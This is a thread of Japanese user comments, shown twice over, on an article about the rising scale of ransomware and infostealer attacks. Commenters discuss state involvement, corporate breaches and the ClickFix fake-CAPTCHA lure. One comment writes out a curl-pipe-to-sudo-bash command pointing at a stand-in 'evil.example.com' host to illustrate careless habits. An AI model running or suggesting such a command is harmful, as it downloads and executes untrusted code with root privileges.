組織化、分業化した攻撃者の主体は誰なのか。これほど大規模に多発すると単なる営利目的だけとは思えない。中露北鮮など国家の関与も疑われるな…と思う私は陰謀論者か。情報戦争は既に始まっている気がしてならない
英語圏は今までもこうだったんやろな。
アクスルとかアサヒとか大手が次々とやられてるけど、あれって事前の予防は不可能なの?と素人疑問。金と手間を惜しんでたせいなのか、金と手間かけて防御体制組んでてもうっかりミスでやられてしまうものなのか
良いエンジニア雇えば防げるかと言ったら侵入経路はメールとかだし総合的な対策が必要なのね
北朝鮮の外貨収入はサイバー攻撃みたいな話もよく聞く。陰謀論とは言えないのでは?
>ClickFixは、通常のCAPTCHAと思ってクリックすると、「Win-R、Ctrl-V、リターンを押してください」のような指示が表示され、それに従うとPowerShellを使ってマルウェア本体がインストールされてしまい
RaaS(Ransomware as a Service)・MaaS(Malware as a Service)とか、まじか…
「Win-R、Ctrl-V、リターン」を笑う人の一定数は`$ curl -s https://evil.example.com/install.sh | sudo bash` 的なのやっちゃうと思うんだよな……
絶対AIの影響あるだろ
もうそろそろOSを再設計して、プロセスとストレージをNamespaceで分割して、異なるNamespaceにはアクセスできないようにすべきかもね。
ランサムウェア攻撃がかつてないスピード・規模。情報を窃取する“インフォスティーラー”の脅威も【Security Days Fall 2025】
組織化、分業化した攻撃者の主体は誰なのか。これほど大規模に多発すると単なる営利目的だけとは思えない。中露北鮮など国家の関与も疑われるな…と思う私は陰謀論者か。情報戦争は既に始まっている気がしてならない
英語圏は今までもこうだったんやろな。
アクスルとかアサヒとか大手が次々とやられてるけど、あれって事前の予防は不可能なの?と素人疑問。金と手間を惜しんでたせいなのか、金と手間かけて防御体制組んでてもうっかりミスでやられてしまうものなのか
良いエンジニア雇えば防げるかと言ったら侵入経路はメールとかだし総合的な対策が必要なのね
北朝鮮の外貨収入はサイバー攻撃みたいな話もよく聞く。陰謀論とは言えないのでは?
>ClickFixは、通常のCAPTCHAと思ってクリックすると、「Win-R、Ctrl-V、リターンを押してください」のような指示が表示され、それに従うとPowerShellを使ってマルウェア本体がインストールされてしまい
RaaS(Ransomware as a Service)・MaaS(Malware as a Service)とか、まじか…
「Win-R、Ctrl-V、リターン」を笑う人の一定数は`$ curl -s https://evil.example.com/install.sh | sudo bash` 的なのやっちゃうと思うんだよな……
絶対AIの影響あるだろ
もうそろそろOSを再設計して、プロセスとストレージをNamespaceで分割して、異なるNamespaceにはアクセスできないようにすべきかもね。